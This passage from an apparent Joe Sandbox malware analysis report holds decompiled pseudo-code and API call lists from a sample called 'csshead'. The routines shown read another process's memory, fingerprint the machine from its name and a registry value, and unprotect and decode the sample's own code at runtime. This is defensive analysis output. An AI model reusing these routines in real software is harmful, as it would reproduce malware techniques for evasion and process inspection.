    				return 0;
    			}

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0042CE2E
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0042CE51
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004047AC(CHAR* __eax, void** __edx) {
    				CHAR* _v8;
    				void** _v12;
    				long _v16;
    				void* _v20;
    				long _v24;
    				long _v28;
    				void* _t27;
    				void* _t43;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0xffffffff;
    				 *_v12 = 0;
    				_t27 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_v20 = _t27;
    				if(_v20 == 0xffffffff) {
    					_t43 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0); // executed
    					_v20 = _t43;
    				}
    				if(_v20 != 0xffffffff) {
    					_v24 = GetFileSize(_v20, 0);
    					if(_v24 != 0) {
    						E004013B4(_v12, _v24 + 1);
    						ReadFile(_v20,  *_v12, _v24,  &_v28, 0);
    						CloseHandle(_v20);
    						_v16 = _v24;
    					}
    				}
    				return _v16;
    			}

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
    • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
    • GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
    • CloseHandle.KERNEL32(?), ref: 00404849
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 37%
    			E004092CD() {
    				void* _t3;
    				intOrPtr _t10;
    				intOrPtr _t11;
    				intOrPtr* _t18;
    				intOrPtr* _t21;
    				void* _t24;
    				void* _t25;
    
    				_t3 =  *_t21();
    				_t28 = _t3;
    				if(_t3 != 0) {
    					 *_t18(0);
    				}
    				_pop(_t22);
    				_pop(_t19);
    				GetModuleFileNameA(0, _t25 - 0x117 + 2, 0x103);
    				_t10 = E00407C50(_t25 - 0x117 + 2); // executed
    				 *0x40a06c = _t10;
    				_t11 =  *0x40a06c; // 0x5b392e46
    				wsprintfA("1530474054", E00409468, _t11);
    				_push(GetCursorPos(0x40a578));
    				E004069BC(_t24, _t28); // executed
    				goto __eax;
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 004092F0
      • Part of subcall function 00407C50: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
      • Part of subcall function 00407C50: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
      • Part of subcall function 00407C50: ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
      • Part of subcall function 00407C50: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
      • Part of subcall function 00407C50: ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
      • Part of subcall function 00407C50: CloseHandle.KERNEL32(000000FF), ref: 00407CE7
    • wsprintfA.USER32 ref: 00409319
    • GetCursorPos.USER32(0040A578), ref: 00409327
      • Part of subcall function 004069BC: GetTempPathA.KERNEL32(00000101,?), ref: 004069E1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 33%
    			E00406B70(void* __ebx, intOrPtr* __ecx) {
    				intOrPtr _v4;
    				char _v28;
    				intOrPtr _t35;
    				intOrPtr _t38;
    				void* _t50;
    				void* _t55;
    				intOrPtr _t56;
    				void* _t57;
    				intOrPtr* _t62;
    				intOrPtr* _t74;
    				intOrPtr* _t76;
    				intOrPtr* _t78;
    				void* _t80;
    				signed int _t86;
    				signed int _t88;
    				signed int _t90;
    				intOrPtr* _t92;
    
    				_t62 = __ecx;
    				_t55 = __ebx;
    				_t74 = __ecx;
    				_t86 = 0;
    				if( *((intOrPtr*)(__ecx + 8)) <= 0) {
    					L6:
    					return 1;
    				} else {
    					while(_t86 >= 0 && _t86 <  *((intOrPtr*)(_t74 + 8))) {
    						_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t74 + 4)) + _t86 * 4));
    						_t35 =  *((intOrPtr*)( *_t62 + 0x1c));
    						Sleep(??); // executed
    						if(_t35 == 0) {
    							return 0;
    						} else {
    							_t86 = _t86 + 1;
    							if(_t86 <  *((intOrPtr*)(_t74 + 8))) {
    								continue;
    							} else {
    								goto L6;
    							}
    						}
    						goto L30;
    					}
    					RaiseException(0xc000008c, 1, 0, 0);
    					asm("int3");
    					asm("int3");
    					_push(_t86);
    					_push(_t74);
    					_t76 = _t62;
    					_t88 = 0;
    					if( *((intOrPtr*)(_t76 + 8)) <= 0) {
    						L14:
    						return _t35;
    					} else {
    						_push(_t55);
    						_t56 = _v4;
    						while(_t88 >= 0 && _t88 <  *((intOrPtr*)(_t76 + 8))) {
    							_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 4)) + _t88 * 4));
    							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t62 + 0x20))))(_t56);
    							_t88 = _t88 + 1;
    							if(_t88 <  *((intOrPtr*)(_t76 + 8))) {
    								continue;
    							} else {
    								goto L14;
    							}
    							goto L30;
    						}
    						RaiseException(0xc000008c, 1, 0, 0);
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						_push(_t56);
    						_push(_t88);
    						_push(_t76);
    						_t78 = _t62;
    						_t57 = 0;
    						_t90 = 0;
    						if( *((intOrPtr*)(_t78 + 8)) <= 0) {
    							L20:
    							return _t57;
    						} else {
    							while(_t90 >= 0 && _t90 <  *((intOrPtr*)(_t78 + 8))) {
    								_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 4)) + _t90 * 4));
    								_t50 =  *((intOrPtr*)( *((intOrPtr*)( *_t62 + 0x18))))();
    								_t90 = _t90 + 1;
    								_t57 = _t57 + _t50;
    								if(_t90 <  *((intOrPtr*)(_t78 + 8))) {
    									continue;
    								} else {
    									goto L20;
    								}
    								goto L30;
    							}
    							RaiseException(0xc000008c, 1, 0, 0);
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							_push(_t90);
    							_t92 = _t62;
    							_t38 =  *_t92;
    							_push(_t78);
    							_t80 = _t38 - 0xc;
    							if( *((intOrPtr*)(_t38 - 0xc)) > 1) {
    								L25:
    								if(L00402450(_t92,  *((intOrPtr*)(_t80 + 4)), _t38, 1,  &_v28) != 0 && _t80 !=  *0x440020) {
    									_push(_t80);
    									if( *0x4332a4() <= 0) {
    										_push(_t80);
    										L004221B4();
    									}
    								}
    								return _t92;
    							} else {
    								_t64 =  *((intOrPtr*)(_t38 - 8));
    								_t68 =  *((intOrPtr*)(_t38 - 4));
    								_push(_t57);
    								if( *((intOrPtr*)(_t38 - 8)) + 1 >  *((intOrPtr*)(_t38 - 4))) {
    									goto L25;
    								} else {
    									E00401850(_t64 + _t38, _t68 + 1,  &_v28, 1);
    									 *((intOrPtr*)( *_t92 - 8)) =  *((intOrPtr*)( *_t92 - 8)) + 1;
    									 *((char*)( *_t92 +  *((intOrPtr*)( *_t92 - 8)))) = 0;
    									return _t92;
    								}
    							}
    						}
    					}
    				}
    				L30:
    			}

    APIs
    • Sleep.KERNELBASE ref: 00406B94
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00406BB8
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,00000000), ref: 00406BFE
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,?,?,?,00000000), ref: 00406C4F
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 83%
    			E00404EF0(void* __eax, void* __eflags) {
    				void* _v8;
    				void _v12;
    				void* _v16;
    				void _v20;
    				void _v24;
    				void* _v28;
    				void* _v32;
    				long _v36;
    				intOrPtr* _v40;
    				void* _v52;
    				void _v64;
    				void* _t54;
    				signed int _t63;
    				signed int _t72;
    				signed int _t88;
    				signed int _t96;
    
    				_v8 = __eax;
    				_v24 = 0;
    				_v12 = 0;
    				_v28 = E004013DC(0x1000);
    				_t54 = E00404E94(_v8); // executed
    				_v32 = _t54;
    				if(_v32 != 0) {
    					_t63 = ReadProcessMemory(_v8, _v32, _v28, 0x1000,  &_v36); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t63) != 0) {
    						_t72 = ReadProcessMemory(_v8,  *((intOrPtr*)(_v28 + 0x3c)) + _v32, _v28, 0x1000,  &_v36); // executed
    						asm("sbb eax, eax");
    						if( ~( ~_t72) != 0) {
    							_v24 =  *((intOrPtr*)(_v28 + 0x28)) + _v32;
    							_v40 = _v28 + 0xc0;
    							if( *_v40 != 0 &&  *((intOrPtr*)(_v40 + 4)) != 0) {
    								_t88 = ReadProcessMemory(_v8,  *_v40 + _v32,  &_v64, 0x18,  &_v36);
    								asm("sbb eax, eax");
    								if( ~( ~_t88) != 0) {
    									_v16 = _v52;
    									if(_v16 != 0) {
    										_t96 = ReadProcessMemory(_v8, _v16, _v28, 0x1000,  &_v36);
    										asm("sbb eax, eax");
    										if( ~( ~_t96) != 0) {
    											_v20 =  *_v28;
    											if(_v20 != 0) {
    												_v24 = _v20;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				E00401440(_v28);
    				_v12 = _v24;
    				return _v12;
    			}

    APIs
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
      • Part of subcall function 00404E94: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00404EAD
      • Part of subcall function 00404E94: ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 00404EDD
    • ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
    • ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 92%
    			E00406900(intOrPtr __eax, void* __edx) {
    				intOrPtr _v8;
    				long _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				intOrPtr _v117;
    				char _v153;
    				char* _t30;
    				intOrPtr _t35;
    
    				asm("das");
    				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
    				_v117 = _v117 + __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x81;
    				if(GetComputerNameA( &_v153,  &_v12) != 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v153),  &_v153);
    				}
    				_t30 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t30, 0, 0x20119,  &_v24); // executed
    				_v12 = 4;
    				_v20 = 0;
    				_t35 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v24, _t35, 0, 0,  &_v20,  &_v12); // executed
    				E00403890(_v24);
    				_v16 = _v16 ^ _v20 ^ 0xac67baee;
    				return E00401164(_v16, _v8);
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 00406927
    • RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00406904(intOrPtr __eax) {
    				intOrPtr _v8;
    				long _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				char _v153;
    				char* _t28;
    				intOrPtr _t33;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x81;
    				if(GetComputerNameA( &_v153,  &_v12) != 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v153),  &_v153);
    				}
    				_t28 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t28, 0, 0x20119,  &_v24); // executed
    				_v12 = 4;
    				_v20 = 0;
    				_t33 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v24, _t33, 0, 0,  &_v20,  &_v12); // executed
    				E00403890(_v24);
    				_v16 = _v16 ^ _v20 ^ 0xac67baee;
    				return E00401164(_v16, _v8);
    			}
    0x0040690d 0x00406912 0x00406915 0x0040692f 0x0040694c 0x0040694c 0x0040695a 0x00406965 0x0040696b 0x00406974 0x00406983 0x0040698d 0x00406998 0x004069a8 0x004069b9

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 00406927
    • RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00403D10(CHAR* _a4, CHAR* _a8) {
    				CHAR* _t4;
    				CHAR* _t7;
    				char _t8;
    				CHAR* _t10;
    
    				_t10 = _a4;
    				if(_t10 == 0) {
    					L8:
    					return 0;
    				} else {
    					_t7 = _a8;
    					while( *_t10 != 0) {
    						_t4 = _t7;
    						if(_t7 == 0) {
    							L7:
    							_t10 = CharNextA(_t10);
    							if(_t10 != 0) {
    								continue;
    							} else {
    								goto L8;
    							}
    						} else {
    							while(1) {
    								_t8 =  *_t4;
    								if(_t8 == 0) {
    									goto L7;
    								}
    								if( *_t10 == _t8) {
    									return CharNextA(_t10);
    								} else {
    									_t4 = CharNextA(_t4); // executed
    									if(_t4 != 0) {
    										continue;
    									} else {
    										goto L7;
    									}
    								}
    								goto L10;
    							}
    							goto L7;
    						}
    						goto L10;
    					}
    					goto L8;
    				}
    				L10:
    			}
    0x00403d12 0x00403d19 0x00403d4c 0x00403d4f 0x00403d1b 0x00403d1b 0x00403d25 0x00403d2a 0x00403d2e 0x00403d41 0x00403d44 0x00403d48 0x00000000 0x00000000 0x00000000 0x00000000 0x00403d30 0x00403d30 0x00403d30 0x00403d34 0x00000000 0x00000000 0x00403d38 0x00403d56 0x00403d3a 0x00403d3b 0x00403d3f 0x00000000 0x00000000 0x00000000 0x00000000 0x00403d3f 0x00000000 0x00403d38 0x00000000 0x00403d30 0x00000000 0x00403d2e 0x00000000 0x00403d25 0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
      • Part of subcall function 0042893E: RtlEncodePointer.NTDLL(5316C151), ref: 0042894A
    • __initterm_e.LIBCMT ref: 00424479
      • Part of subcall function 0042C3B0: __FindPESection.LIBCMT ref: 0042C40B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 23%
    			E00424443(void* __edi, void* __esi, intOrPtr _a4) {
    				void* _t3;
    				intOrPtr* _t9;
    				void* _t19;
    				intOrPtr* _t20;
    				void* _t22;
    
    				_t22 = __esi;
    				_t19 = __edi;
    				_t25 =  *0x436b28;
    				if( *0x436b28 != 0 && E0042C3B0(_t25, 0x436b28) != 0) {
    					 *0x436b28(_a4);
    				}
    				E0042893E();
    				_t3 = L0042441F(0x433634, 0x433650); // executed
    				_t27 = _t3;
    				if(_t3 == 0) {
    					_push(_t22);
    					_push(_t19);
    					E004249B3(_t27, 0x42c2f8); // executed
    					_t20 = 0x433618;
    					if(0x433618 >= 0x433630) {
    						L8:
    						_t31 =  *0x444aa8;
    						if( *0x444aa8 != 0 && E0042C3B0(_t31, 0x444aa8) != 0) {
    							 *0x444aa8(0, 2, 0);
    						}
    						return 0;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						_t9 =  *_t20;
    						if(_t9 != 0) {
    							 *_t9();
    						}
    						_t20 = _t20 + 4;
    					} while (_t20 < 0x433630);
    					goto L8;
    				}
    				return _t3;
    			}
    0x00424443 0x00424443 0x00424448 0x0042444f 0x00424463 0x00424469 0x0042446a 0x00424479 0x00424480 0x00424482 0x00424484 0x00424485 0x0042448b 0x0042449b 0x0042449f 0x004244b0 0x004244b0 0x004244b9 0x004244d0 0x004244d0 0x00000000 0x00000000 0x00000000 0x00000000 0x004244a1 0x004244a1 0x004244a1 0x004244a5 0x004244a7 0x004244a7 0x004244a9 0x004244ac 0x00000000 0x004244a1 0x004244d9

    APIs
      • Part of subcall function 0042893E: RtlEncodePointer.NTDLL(0042F6FF,?,?,0042446F), ref: 0042894A
    • __initterm_e.LIBCMT ref: 00424479
      • Part of subcall function 0042C3B0: __FindPESection.LIBCMT ref: 0042C40B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
      • Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0
    • std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 66%
    			E00423911(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
    				char* _v8;
    				signed int _v20;
    				intOrPtr _v24;
    				signed int _v36;
    				void* _v40;
    				void _v64;
    				void* _t23;
    				signed int _t24;
    				signed int _t29;
    				signed int _t38;
    				void* _t42;
    				void* _t43;
    				void* _t49;
    
    				_t49 = __esi;
    				_t43 = __edi;
    				_t42 = __edx;
    				while(1) {
    					_t23 = E00422A18(_t42, _t43, _t49, _a4); // executed
    					if(_t23 != 0) {
    						break;
    					}
    					_t24 = L00427A95(_a4);
    					__eflags = _t24;
    					if(_t24 == 0) {
    						__eflags =  *0x442bfc & 0x00000001;
    						if(( *0x442bfc & 0x00000001) == 0) {
    							 *0x442bfc =  *0x442bfc | 0x00000001;
    							__eflags =  *0x442bfc;
    							_push(1);
    							_v8 = "bad allocation";
    							L00423101(0x442bf0,  &_v8);
    							 *0x442bf0 = 0x435828;
    							E004249B3( *0x442bfc, 0x432eb5);
    						}
    						L00423217( &_v20, 0x442bf0);
    						_push(0x43c9f8);
    						_push( &_v20);
    						_v20 = 0x435828;
    						L7();
    						asm("int3");
    						_push(0x435828);
    						_push(0x442bf0);
    						_t38 = 8;
    						_v40 = memcpy( &_v64, 0x436bb0, _t38 << 2);
    						_t29 = _v20;
    						_v36 = _t29;
    						__eflags = _t29;
    						if(_t29 != 0) {
    							__eflags =  *_t29 & 0x00000008;
    							if(( *_t29 & 0x00000008) != 0) {
    								_v20 = 0x1994000;
    							}
    						}
    						return  *0x4332c8(_v40, _v36, _v24,  &_v20);
    					} else {
    						continue;
    					}
    					L11:
    				}
    				return _t23;
    				goto L11;
    			}
    0x00423911 0x00423911 0x00423911 0x00423928 0x0042392b 0x00423933 0x00000000 0x00000000 0x0042391e 0x00423924 0x00423926 0x00423937 0x00423948 0x0042394a 0x0042394a 0x00423951 0x00423959 0x00423960 0x0042396a 0x00423970 0x00423975 0x0042397a 0x0042397f 0x00423987 0x00423988 0x0042398b 0x00423990 0x0042399c 0x0042399d 0x004239a0 0x004239ab 0x004239ae 0x004239b2 0x004239b6 0x004239b8 0x004239ba 0x004239bd 0x004239bf 0x004239bf 0x004239bd 0x004239da 0x00000000 0x00000000 0x00000000 0x00000000 0x00423926 0x00423936 0x00000000

    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D
      • Part of subcall function 00427A95: DecodePointer.KERNEL32(?,0042B008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 00427AA0
    • std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,?,?), ref: 004239D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004090B8(void* __edx) {
    				long _v8;
    				intOrPtr _t4;
    				void* _t6;
    				void* _t8;
    				intOrPtr _t11;
    				void* _t15;
    				intOrPtr _t17;
    				intOrPtr _t20;
    
    				E0040252C();
    				_t4 =  *0x40a274; // 0x4021ec
    				_t6 =  *0x40a078; // 0x401bd8
    				VirtualProtect(_t6, _t4 -  *0x40a078, 0x40,  &_v8);
    				_t17 =  *0x40a164; // 0x401de4
    				_t8 =  *0x40a078; // 0x401bd8
    				E00407C08(_t8 + 5, _t17 -  *0x40a078 - 5);
    				_t20 =  *0x40a274; // 0x4021ec
    				_t11 =  *0x40a164; // 0x401de4
    				E0040898C(_t11 + 5, _t20 -  *0x40a164 - 5);
    				_t15 = E00402574(0); // executed
    				return _t15;
    			}
    0x004090bc 0x004090c7 0x004090d3 0x004090d9 0x004090df 0x004090ee 0x004090f6 0x004090fb 0x0040910a 0x00409112 0x00409119 0x00409120

    APIs
    • VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
    • GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
